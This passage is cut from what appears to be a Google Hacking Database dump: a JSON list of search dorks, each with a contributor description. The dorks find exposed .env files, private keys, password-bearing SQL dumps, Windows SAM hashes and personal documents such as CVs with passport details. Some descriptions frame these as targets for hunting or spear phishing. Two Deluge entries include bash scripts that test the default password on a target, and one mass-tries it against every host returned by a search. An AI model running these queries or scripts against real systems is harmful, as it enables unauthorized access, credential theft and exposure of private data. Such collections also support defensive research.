Use\r\nresposible and ethical!\r\n\r\nDork by _palone."}, {"dork": "allintitle:\"Forum Post Assistant :\" ext:php -site:joomla.org", "description": "allintitle:\"Forum Post Assistant :\" ext:php -site:joomla.org\r\n\r\nThe above dork will open joomla forum assistant. Which discloses alot of information like;DB name, DB version, Server internal path , PHP version, Platform, Kernal version, Enabled PHP Extensions etc.\r\n\r\nAamir Rehman"}, {"dork": "\"[LocalizedFileNames]\" inurl:\"desktop.ini\" ext:ini -git -wiki", "description": "Finds desktop.ini files which have lists of shortcuts on the desktop. Often\r\ndifferent software, including insecure software, creates desktop shortcuts.\r\nYou can use this to find different software running on the server.\r\n\r\nDxtroyer"}, {"dork": "\"[Tera Term]\" inurl:\"teraterm.ini\" ext:ini -git", "description": "Finds Tera Term configuration files, containing juicy information about the\r\nSSH server\r\n\r\nDxtroyer"}, {"dork": "inurl:\"plesk-stat\"", "description": "Author: Cr33pb0y\r\n\r\nDescription: This dork shows server stadistitics and posibly pages paths\r\nand juicy information about users behaviour."}, {"dork": "inurl:\"/xmlrpc.php?rsd\" & ext:php", "description": "This dork show results which have sensitive information about xmlrpc.php of\r\nCMS Wordpress site.\r\n\r\nManhNho"}, {"dork": "allinurl:awstats.pl?config=", "description": "Using this dork, one will be able to find the web statistics for the server\r\nincluding who is visiting this site, which pages are frequented, error\r\ncodes and much more.\r\n\r\n*Nishaanth Guna*\r\nSecurity Researcher, *Appknox https://www.appknox.com/*"}, {"dork": "inurl:/fantastico_fileslist.txt + ext:txt", "description": "inurl:/fantastico_fileslist.txt + ext:txt\r\n\r\nThis dork show results which have fantastico_fileslist.txt\r\nThis file contains a list of all the files from the current directory. The\r\ncontents of this file may expose sensitive information to an attacker.\r\n\r\nManhNho"}, {"dork": "ext:pem \"PRIVATE KEY\" -site:facebook.com -example -test*", "description": "Locate private keys that are publicly accessible.\r\n\r\nYou can also look use filetype:pem to search instead.\r\n\r\nOther file types that may represent keys include:\r\n.p12\r\n.pki\r\n.crt\r\n.key\r\n\r\nLooking for the term \"PRIVATE KEY\" will look for the typical \"BEGIN RSA\r\nPRIVATE KEY\" or \"END RSA PRIVATE KEY\" but will target multiple key types\r\nand both beginning and end.\r\n\r\nRemoving site's like facebook.com reduces the number of user names that may\r\nmatch the search. Removing words like \"example\" and \"test\" removes the\r\nnumber of keys that are published on purpose for demonstrations.\r\n\r\nThis will produce a LOT of github results. If you want to look for other\r\nsites that may have accidentally published keys, add \"-site:github.com\" or\r\n\"-github\"\r\n\r\nHappy hunting.\r\n\r\n-oni49"}, {"dork": "inurl:\"/etc/fail2ban/\" + ext:conf", "description": "inurl:\"/etc/fail2ban/\" + ext:conf\r\n\r\n\r\nFail2ban config files\r\n\r\ninurl:\"/etc/fail2ban/filter.d/\" + ext:conf\r\n\r\nFail2ban filter.d config files\r\n\r\n\r\n\r\nManhNho"}, {"dork": "intext:\"Dr.Web (R) Anti-virus. Virus base add-on\" + ext:txt", "description": "intext:\"Dr.Web (R) Anti-virus. Virus base add-on\" + ext:txt\r\n\r\nDr.Web Anti-virus information\r\n\r\nManhNho"}, {"dork": "filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES", "description": "Google Dork : filetype:sql intext:password | pass | passwd intext:username\r\nintext:INSERT INTO `users` VALUES\r\n\r\nAuthor: screetsec\r\n\r\nDescription: This dork allow you to specific find file contains Username,\r\nPassword, Secret Keys and allows you to search for sql configuration file"}, {"dork": "inurl:/gravity_forms/logs ext:txt", "description": "Exposes gravity forms WordPress plugin and add-on debugging logs.\r\nThis can lead to exposure of form submission information including transaction data, PII and disclosure of plugin versions and directory structures.\r\n\r\nHappy Hunting\r\n\r\n@Shadow0pz"}, {"dork": "intitle:\"index of\" docker-compose.yml", "description": "File contains juicy info about docker containers, like DB configurations\r\nand more.\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"index of\" .env", "description": "Files containing database and sometimes email passwords\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | inurl:/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42", "description": "inurl:/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |\r\ninurl:/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42\r\n\r\nPHP reveals potentially sensitive information via certain HTTP requests\r\nthat contain specific QUERY strings\r\n\r\nManhNho"}, {"dork": "intitle:\"Proberv0.\" | inurl:/proberv.php", "description": "intitle:\"Proberv0.\" | inurl:/proberv.php\r\n\r\nReveals a lot of sensitive information via Proberv.php\r\n\r\nManhNho"}, {"dork": "intitle:\"index of\" intext:\"pip-selfcheck.json\"", "description": "Description :\r\nPython virtual environment indexes.\r\n\r\nDork : intitle:\"index of\" intext:\"pip-selfcheck.json\"\r\n\r\nAuthor:\r\nVipin Joshi ( @vocuzi )"}, {"dork": "intitle:\"index of\" inurl:\"paypal\" log", "description": "Juicy info regarding PayPal accounts, Server configurations related to\r\nPayPal payments and other sensitive files related to it.\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intext:database inurl:\"laravel.log\" ext:log", "description": "Juicy info in Laravel logs giving database names, usernames, php functions\r\nand so on\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "dwsync.xml intitle:index of -gitlab -github", "description": "Dreamweaver sync file which sometimes gives aways paths and names of\r\nsensitive files\r\n\r\n\r\nBruno Schmid"}, {"dork": "allinurl:mc4wp-debug.log ext:log", "description": "Dork: Mail Chimp log.\r\n\r\nEnjoy.\r\nDork by Rootkit Pentester!."}, {"dork": "config.yaml intitle:\"index of\" vagrantfile", "description": "Juicy info from puppet\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intext:\"[***] Results from\" + ext:txt + \"snort-\"", "description": "intext:\"[***] Results from\" + ext:txt + \"snort-\"\r\n\r\nShow interested Snort rules\r\n\r\nManhNho"}, {"dork": "CakePHP filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values", "description": "This dork allow you to specific find file contains Username,\r\nPassword, Secret Keys and allows you to search for sql configuration file.\r\n\r\n\r\nThanks\r\nArya Usha"}, {"dork": "intitle:\"Deluge: Web UI 1.3\"", "description": "GoogleDork v1 ~ `intitle:\"Deluge: Web UI 1.3\" `\r\nGoogleDork v2 ~ `intitle:\"Deluge: Web UI 1.3\" Filters. Status; Details; Files; Peers; Options. Downloaded: Uploaded:`\r\n\r\nDefault password: `deluge` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1\r\nDefault port: `8112` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1\r\n\r\n- - - \r\n\r\n## Bash\r\n\r\n```\r\nurl=\"http://target.com:8112/json\"\r\npass=\"deluge\"\r\n\r\nreq=$( curl \\\r\n -s \\\r\n --header 'Content-Type: application/json' \\\r\n --data '{\"method\":\"auth.login\",\"params\":[\"'${pass}'\"],\"id\":1}' \\\r\n --compressed \\\r\n \"${url}\" )\r\n\r\necho ${req} | grep -q '\"result\": true' \\\r\n && echo 'w000h000!' \\\r\n || echo 'b00'\r\n```\r\n\r\n- - - \r\n\r\n## Aut0PWN3r\r\n\r\n//brew install googler//\r\n\r\n```\r\ngoogler \\\r\n --count 999 \\\r\n --unfilter \\\r\n --json \\\r\n --noprompt \\\r\n 'intitle:\"Deluge: Web UI 1.3\" -exploit -vulnerability' \\\r\n | awk -F'\"' '/\"url\"/ {print $4}' \\\r\n > /tmp/results.txt\r\n\r\nfor x in $( cat /tmp/results.txt ); do\r\n curl \\\r\n -s \\\r\n --header 'Content-Type: application/json' \\\r\n --data '{\"method\":\"auth.login\",\"params\":[\"deluge\"],\"id\":1}' \\\r\n --compressed \\\r\n --max-time 5 \\\r\n \"${x}/json\" \\\r\n | grep -q true \\\r\n && echo \"[*] w000h000! ~ ${x}\" \\\r\n || echo \"[-] b00 ~ ${x}\"\r\ndone\r\n```\r\n\r\n- - - \r\n\r\n## Other Work\r\n\r\n- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/\r\n- Deluge v1+v2 (+autopwner) ~ https://www.exploit-db.com/ghdb/4741/\r\n- Deluge v3 ~ https://www.exploit-db.com/ghdb/4742/"}, {"dork": "intitle:\"Deluge: Web UI\" inurl:\":8112\"", "description": "GoogleDork v3 ~ intitle:\"Deluge: Web UI\" inurl:\":8112\" \r\n\r\nDefault password: `deluge` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1\r\nDefault port: `8112` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1\r\n\r\n\r\n- - - \r\n\r\n## Bash\r\n\r\n```\r\nurl=\"http://target.com:8112/json\"\r\npass=\"deluge\"\r\n\r\nreq=$( curl -s \"${url}\" \\\r\n -H 'Content-Type: application/json' \\\r\n --data-binary '{\"method\":\"auth.login\",\"params\":[\"'${pass}'\"],\"id\":1}' \\\r\n --compressed )\r\n\r\necho ${req} | grep -q '\"result\": true' \\\r\n && echo 'w000h000!' \\\r\n || echo 'b00'\r\n```\r\n\r\n- - - \r\n\r\n## Other Work\r\n\r\n- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/\r\n- Deluge v1+v2 (+autopwner) ~ https://www.exploit-db.com/ghdb/4741/\r\n- Deluge v3 ~ https://www.exploit-db.com/ghdb/4742/"}, {"dork": "filetype:log inurl:\"log\" \"[SERVER_SOFTWARE]\"", "description": "Plenty of juicy info\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"Index of /logs/\" \"lighttpd\"", "description": "Files Containing Juicy Info\r\n\r\nWill reveal website traffic logs of sites using lighttp. Can be used to\r\nmonitor how much traffic a website is getting and where from.\r\n\r\n*By: *edm0nd\r\nhttps://twitter.com/Edmond_Major"}, {"dork": "filetype:env intext:\"APP_ENV\"", "description": "# Exploit Title: Environment Laravel (PHP Framework) information disclosure\r\n # Google Dork: filetype:env intext:\"APP_ENV\"\r\n # Date: 05/04/2018\r\n # Contains sensitive information:\r\n username, password, mail accounts, etc.\r\n\r\n # Dork Author: Carlos E. Vieira"}, {"dork": "\"Declassified and Approved for Release by\" filetype: pdf", "description": "\"Declassified and Approved for Release by\" filetype: pdf\r\n\r\nThis dork show some interested docs of NSA,CIA,...\r\n\r\nManhNho"}, {"dork": "inurl:\"/Setup/Default.aspx\" \"mojoPortal\"", "description": "MojoPortal installation pages giving juicy info.\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"index.of.virtualbox\" -mirror -mirrors -public -ubuntu.com -edu -pub", "description": "Dorks containing full working Virtual machines images.\r\n\r\nAlso try: intitle:\"index.of.vmware\" -mirror -mirrors -public -ubuntu.com\r\n-edu -keygen -bitdowload\r\nfor some VMWare Virtual machines.\r\n\r\n\r\nBruno Schmid"}, {"dork": "ext:adr adr filetype:adr \"bookmarks.adr\"", "description": "Dorks containing Opera bookmarks, some with juicy info.\r\n\r\n\r\n\r\nBruno Schmid\r\n\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/bigdump.php\" + intitle:\"BigDump ver.\"", "description": "inurl:\"/bigdump.php\" + intitle:\"BigDump ver.\"\r\n\r\nShow \"BigDump: Staggered MySQL Dump Importer\" Page\r\n\r\nManhNho"}, {"dork": "inurl:/.well-known/security.txt", "description": "Files Containing Juicy Info\r\n\r\nThis will return a list of all indexed websites that have\r\nimplemented the proposed security.txt standard (https://securitytxt.org/).\r\nYou could use this as a way to find companies that have bug bounty programs\r\nthat will pay you for discovering vulns or exploits.\r\n\r\n*By:* edm0nd\r\nhttps://twitter.com/Edmond_Major"}, {"dork": "inurl:/daten/webyep-log.txt", "description": "Access to logs files.\r\n\r\n\r\nAuthor: Marcin W. Brz\u00f3zka\r\nhttps://www.linkedin.com/in/marcin-brz%C3%B3zka-044006162/"}, {"dork": "inurl:..//drivers/etc/ intitle:index of", "description": "Windows Host File used to map IP addresses.\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "ext:txt {\"wallet_address\" :\", \"pool_address\" : \" \", \"pool_password\" -git", "description": "ext:txt {\"wallet_address\" :\", \"pool_address\" : \" \", \"pool_password\" -git\r\n\r\nConfig.txt miners\r\n\r\nManhNho"}, {"dork": "intitle:\"Powered by Qualys SSL Labs\"", "description": "Search for the SSL security report on the server with some sensitive\r\ninformation.\r\n\r\nSang Bui"}, {"dork": "inurl:fisheye AND inurl:changelog -site:atlassian.com -site:github.com -intext:\"Log in to FishEye\"", "description": "inurl:fisheye AND inurl:changelog -site:atlassian.com -site:github.com\r\n-intext:\"Log in to FishEye\"\r\n\r\nLots of interesting fisheye/crucible code commits and reviews.\r\n\r\nDec0y"}, {"dork": "inurl:\"?db_backup\" | inurl:\"dbbackup\" -site:github.com \"sql.gz\" | \"sql.tgz\" | \"sql.tar\" | \"sql.7z\"", "description": "Some database backups.\r\nChange the SQL extension for another of your choice. (db, mdb, sl3,\r\nsl2, sqlitedb) and so on...\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "AndroidManifest ext:xml -github -gitlab -googlesource", "description": "AndroidManifest ext:xml -github -gitlab -googlesource\r\n\r\nAndroidManifest.xml files\r\n\r\nManhNho"}, {"dork": "filetype:env intext:AWS_SECRET", "description": ".env files having AWS keys and other juicy info\r\n\r\nAmal Jossy"}, {"dork": "filetype:env intext:mail_host + intext:bluehost", "description": ".env files with Bluehost webmail username and password used by Laravel apps\r\n\r\nAmal Jossy"}, {"dork": "filetype:gitattributes intext:CHANGELOG.md -site:github.com", "description": "*Google* dork *description: *Find gitattributes on websites other than on\r\ngithub repositories\r\n\r\n*Google Search: *filetype:gitattributes intext:CHANGELOG.md -site:github.com\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "allintitle:restricted filetype:doc site:gov", "description": "Some juicy Information\r\n\r\nAuthor: Subhash Rawat"}, {"dork": "intext:cv OR intext:curriculum vitae \"passport details\" ext:doc -template", "description": "Find CVs online containing Juicy Information\r\n\r\n\r\n\r\nTheManyHatsClub - admin@crypt.fi - @buydogs"}, {"dork": "intitle:\"This is pdfTeX, Version\"", "description": "intitle:\"This is pdfTeX, Version\"\r\n\r\npdfTeX logs information\r\n\r\nManhNho"}, {"dork": "filetype:xls | xlsx intext:software license site:.gov", "description": "Dork for juicy info.\r\nAlso try:\r\n filetype:doc | pdf intext:software license site:.gov\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:xls | xlsx intext:cisco -cisco.com site:.gov", "description": "Very nice network infrastructure info\r\n\r\nAlso try:\r\nfiletype:xls | xlsx intext:fortigate -fortinet.com site:.gov\r\nfiletype:xls | xlsx intext:bluecoat -bluecoat.com site:.gov\r\nfiletype:xls | xlsx intext:checkpoint -checkpoint.com site:.gov\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:vmware virtual site:.gov filetype:xls | xlsx | doc | pdf", "description": "Lots of info on target's virtualization environment.\r\nChange the site parameter to whatever you want or just get rid of it.\r\n\r\nAlso try:\r\n\r\nintext:vmclusters site:.gov filetype:xls | xlsx | doc | pdf\r\nintext:virtual hosts site:.gov filetype:xls | xlsx | doc | pdf\r\nintext:virtual environment site:.gov filetype:xls | xlsx | doc | pdf\r\nintext:vlan vhosts site:.gov filetype:xls | xlsx | doc | pdf\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:txt Administrator:500:", "description": "Find Windows SAM database hashes\r\n\r\n\r\nfiletype:txt Administrator:500:\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "inurl:\"root?originalDomain\"", "description": "Dorks giving up domains and hosts information\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"debug/default/view?panel=config\"", "description": "inurl:\"debug/default/view?panel=config\"\r\n\r\nThis dork will open the debug page of Yii framework. Which discloses all the requests to Yii framework, in some cases POST request contains clear text username/password, it also discloses server Phpinfo details and database queries.\r\n\r\nThanks\r\nAamir Rehman"}, {"dork": "\"air confirmation\" \"passenger(s)\"", "description": "Dork with very juicy information.\r\n\r\nRootkit Pentester."}, {"dork": "inurl:\"/p3p.xml\" | intitle: \"p3p.xml\" -github.com", "description": "inurl:\"/p3p.xml\" | intitle: \"p3p.xml\" -github.com\r\n\r\np3p.xml files\r\n\r\nManhNho"}, {"dork": "\"var miner=new CryptoLoot.Anonymous\" intext:CryptoLoot.Anonymous", "description": "This is a dork for search sites running Crypto loot miner\r\n\r\nDork : \"var miner=new CryptoLoot.Anonymous\" intext:CryptoLoot.Anonymous\r\n\r\nSMII Mondher"}, {"dork": "inurl:travis.yml tornado site:github.com", "description": "This can be used to identify the code hosted by different companies that\r\nuse Tornado Web Server.\r\n\r\nThanks,\r\nMufeed VH"}, {"dork": "inurl:nginx.conf nginx site:github.com", "description": "This dork can be used to detect codes hosted by different companies that\r\nuses NGINX Web Server.\r\n\r\nMufeed VH"}, {"dork": "intext:\"successfully\" intitle:\"index of\" config | log | logged -stackoverflow", "description": "Some juicy information.\r\nThis can contain successful events of the system like: DB changes, users\r\nactions, file & folder creation, account loggins, etc...\r\n\r\nAlso very usefull to see what kind of application the system is running.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "ext:log intext:\"connection\" intitle:\"index of\" -stackoverflow", "description": "Juicy information mainly found in log files ( WSFTP.LOG, access.log,\r\nmachttp.log, password.log)\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "employee \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx", "description": "This will give you a good insight of the targets BOS(Business Operation\r\nSoftware) and sometimes their supply chain.\r\n\r\nalso try:\r\nnewcomer \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx\r\n\r\nhr | admin \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx\r\n\r\n1st level support \"training\" intitle:index.of ext:doc | pdf | xls |docx\r\n|xlsx\r\n\r\nsuppervisor \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx\r\n\r\nengineer \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx\r\n\r\nYou can also replace \"training\" with \"exercise\" or \"education\"\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "hardware | software \"migration\" intitle:index.of ext:xls | xlsx | doc | docx | pdf", "description": "Information regarding company's IT migration process usefull to find out\r\nwhy, how and what is the target changing/migrating.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:lighttpd.conf lighttpd site:github.com", "description": "This dork can be used to detect codes hosted by different companies that\r\nuses lighttpd Web Server.\r\n\r\nAnwar Ayoob"}, {"dork": "-site:smarty.net ext:tpl intext:\"", "description": "-site:smarty.net ext:tpl intext:\""}, {"dork": "swiftmailer intitle:\"index of\" \"smtp.yml\" | \"smtp.xml\"", "description": "This dork might give passwords and server directoies with juicy info.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"config.yml\" | \"config.xml\" intext:login | auth", "description": "Dorks containing login credentials and more.\r\n\r\nYou can also try.\r\n\r\nintitle:\"index of\" \"config.yml\" | \"config.xml\" intext:user | auth | pass\r\nintitle:\"index of\" \"config.yml\" | \"config.xml\" intext:passwd | auth |\r\npassword\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"config.yml\" | \"config.xml\" intext:login | auth", "description": "Dorks containing login credentials and more.\r\n\r\nYou can also try.\r\n\r\nintitle:\"index of\" \"config.yml\" | \"config.xml\" intext:user | auth | pass\r\nintitle:\"index of\" \"config.yml\" | \"config.xml\" intext:passwd | auth |\r\npassword\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \".gitignore\"", "description": "Here contains information related to what the target uses as IDE, and many\r\nother software related to development. Great for footprinting\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:APIKey ext:js | xml | yml | txt | conf | py -github -stackoverflow intitle:\"index of\"", "description": "Dork containing some API Keys from several web applications.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \".travis.yml\" | \".travis.xml\"", "description": "Juicy info\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"laravel.log\" | \"main.yaml\" | \"server.cfg\"", "description": "Juicy info which sometimes gives you good DB queries or login information\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.php.bak", "description": "inurl:login.php.bak\r\n\r\nThis Google Dork discovers badly configured servers exposing useful and \r\nsensitive information.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "inurl:elmah.axd intext:\"Powered by ELMAH\" -inurl:detail", "description": "# Google Dork: \r\ninurl:elmah.axd intext:\"Powered by ELMAH\" -inurl:detail \r\n# Date: \r\n13.08.2018 \r\n# Exploit Author: \r\nNSIDE Attack Logic GmbH\r\n# Vendor Homepage: \r\nhttps://elmah.github.io/\r\n\r\n#Description:\r\nThis dorks can be used to identify public ELMAH (Error Logging Modules and Handlers) instances that provide sensitive Information, from the application path to the session token of an authenticated user."}, {"dork": "inurl:conf/tomcat-users.xml -github", "description": "inurl:conf/tomcat-users.xml -github\r\n\r\nFind some login information of apache tomcat"}, {"dork": "ext:ppk ssh key -github.com -gitlab", "description": "ext:ppk ssh key -github.com -gitlab\r\n\r\nfile contain SSH key\r\n\r\nManhNho"}, {"dork": "intext:\"PHP Version \" ext:php intext:\"disabled\" intext:\"Build Date\" intext:\"System\" intext:\"allow_url_fopen\"", "description": "Exploit Title: Finds phpinfo() pages that are not tied to extensions or file types.\r\nGoogle Dork: intext:\"PHP Version \" ext:php intext:\"disabled\" intext:\"Build Date\" intext:\"System\" intext:\"allow_url_fopen\"\r\nDate: 9-1-2018\r\nExploit Author: hehnope"}, {"dork": "inurl:/wp-content/ai1wm-backups + wpress", "description": "inurl:/wp-content/ai1wm-backups + wpress"}, {"dork": "inurl:/wp-json/wp/v2/users/ \"id\":1,\"name\":\" -wordpress.stackexchange.com -stackoverflow.com", "description": "Category: Vulnerable file\r\nMisconfiguration attack to get information of wordpress users\r\nManhNho"}, {"dork": "intext:\"define('DB_NAME',\" ext:txt", "description": "intext:\"define('DB_NAME',\" ext:txt\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nWordpress database information.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intext:\"class JConfig {\" inurl:configuration.php", "description": "intext:\"class JConfig {\" inurl:configuration.php\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nJoomla configuaration information.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intitle:\"index of\" intext:twr.html", "description": "intitle:\"index of\" intext:twr.html\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nTripwire reports.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "inurl:/yum.log | intitle:yum.log + ext:log", "description": "inurl:/yum.log | intitle:yum.log + ext:log\r\n\r\nyum log files\r\n\r\nManhNho"}, {"dork": "/var/www/manage/storage/logs/laravel- ext:log", "description": "Laravel logs\r\n\r\nManhNho"}, {"dork": "inurl:robots.txt intext:Disallow: /web.config", "description": "# Google Dork: inurl:robots.txt intext:Disallow: /web.config\r\n# Description: Google Dork to find /web.config file in robots.txt\r\n# Date: 2018-09-21\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "configuration> + filetype:config -github.com", "description": "web.config file\r\n\r\nManhNho"}, {"dork": "inurl:logs/gravityforms", "description": "# Exploit Title: WordPress GravityForms Information Leak\r\n# Google Dork: inurl:logs/gravityforms\r\n# Description: Websites using gravity forms have debug logs that are\r\npublicly available. Note that some include information that has some\r\ninformation from paypal: addresses, cookies, email addresses, ip addresses.\r\n# Date: Sunday Sept. 23, 2018\r\n# Exploit Author: Dhruv Gramopadhye (dgramop)\r\n# Vendor Homepage: https://www.gravityforms.com/\r\n# Version: 2.3.2\r\n# Contact: https://dgramop.xyz\r\n\r\nVersion number estimated, future versions may be affected."}, {"dork": "intext:\"please find attached\" \"login\" | password ext:pdf", "description": "Passwords and information on target's employees/customers. awesome for\r\nspear phishing.\r\n\r\nReplace pdf extension with any other document extension like doc, docx,\r\ntxt...\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:Modified files in JOE when it aborted on JOE was aborted because the terminal closed", "description": "intext:Modified files in JOE when it aborted on JOE was aborted because \r\nthe terminal closed\r\n\r\nThis Google Dork discovers servers exposing possible useful information \r\nhidden in DEADJOE files.\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "filetype:txt line vty 0 4", "description": "filetype:txt line vty 0 4\r\n\r\nDiscover Cisco Running Configuration\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "\"[HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessions]\" ext:reg", "description": "Finds PuTTY session configs, sometimes containing plaintext credentials\r\n\r\nDxtroyer"}, {"dork": "ext:env intext:APP_ENV= | intext:APP_DEBUG= | intext:APP_KEY=", "description": "*Description: *You can find *\"Environment Configuration\"* file *(.env)* Of \"laravel\"* by searching \"*ext:env intext:APP_ENV= | intext:APP_DEBUG= | intext:APP_KEY=\"\r\n\r\nWhere you can grt \"Credentials of database and SMTP servers\"*\r\n\r\n*Author*: Nirmal Dahal (#Nittam)"}, {"dork": "intext:\"Resource dumped by\" intext:jcr -site:adobe.com", "description": "This request shows a Find useful information about Adobe AEM-CQ\r\nimplementation\r\n\r\nDORK: intext:\"Resource dumped by\" intext:jcr -site:adobe.com\r\n\r\nCheers. Sh3llb0y"}, {"dork": "inurl:/_vti_pvt/service.cnf | inurl:/_vti_inf.html | inurl:/_vti_bin/ | inurl:/_vti_bin/spsdisco.aspx", "description": "# Google Dork: inurl:/_vti_pvt/service.cnf | inurl:/_vti_inf.html | inurl:/_vti_bin/ | inurl:/_vti_bin/spsdisco.aspx\r\n# Description: Google Dork to find SharePoint version, FrontPage Configuration Information and SharePoint web services\r\n# Date: 2018-11-07\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "filetype:rdp default.rdp", "description": "Find Remote Desktop Protocol Connection Information\r\n\r\n\r\nfiletype:rdp default.rdp\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "filetype:txt \"License Key\"", "description": "Find License Keys for Various Software Products\r\n\r\n\r\nfiletype:txt \"License Key\"\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "intitle:\"index of\" pagefile.sys", "description": "This large (normally over 1GB) file is created by Windows Systems when\r\nthere is not enough RAM in the system. Since lots of the RAM is in the\r\nfile, chances are that a lot of good information will be in it.\r\n\r\nThis is a Windows dork, wont work in Linux or Mac.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n\r\n@brulliant"}, {"dork": "\"site:ghostbin.com \" / \" \"", "description": "Find recently created documents and pastes for GhostBin.com. If nothing\r\ncomes up, click \"*repeat the search with the omitted results included*.\"\r\n\r\n~ CrimsonTorso"}, {"dork": "\"site:hastebin.com \" / \" \"", "description": "Find recently created documents and pastes for Hastebin.com. If nothing\r\ncomes up, click \"*repeat the search with the omitted results included*.\"\r\n\r\n~ CrimsonTorso"}, {"dork": "inurl:LOG.txt X-System folder", "description": "inurl:LOG.txt X-System folder\r\n\r\nInformation disclosure - System specs. X-Plane.\r\n\r\n~B15mu7h"}, {"dork": "intext:password \"Login Info\" filetype:txt", "description": "Find Username and Password Combo Login Information\r\n\r\n\r\nintext:password \"Login Info\" filetype:txt\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "filetype:txt \"Registration Code\"", "description": "My first dork\r\n\r\nThanks!\r\nT3jv1l"}, {"dork": "filetype:pub \"ssh-rsa\"", "description": "Find SSH Public Keys\r\n\r\n\r\nfiletype:pub \"ssh-rsa\"\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "filetype:doc \"Answer Key\"", "description": "Find Answer Keys\r\n\r\n\r\nfiletype:doc \"Answer Key\"\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "inurl:apspassword", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP Crystal report access ++\r\n\r\ninurl:apspassword\r\n- open SAP crystal databases to browse\r\n- Possible SQL Injection\r\n- Sensitive information\r\n- Possible Cross-Site Scripting\r\n - https://www.exploit-db.com/exploits/32882\r\n- Possible Directory Traversal\r\n - https://www.exploit-db.com/exploits/16054\r\n- 48 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nCredit goes to the boys of Rapid7"}, {"dork": "intext:\"Portador do CPF\"", "description": "Sensitive personal 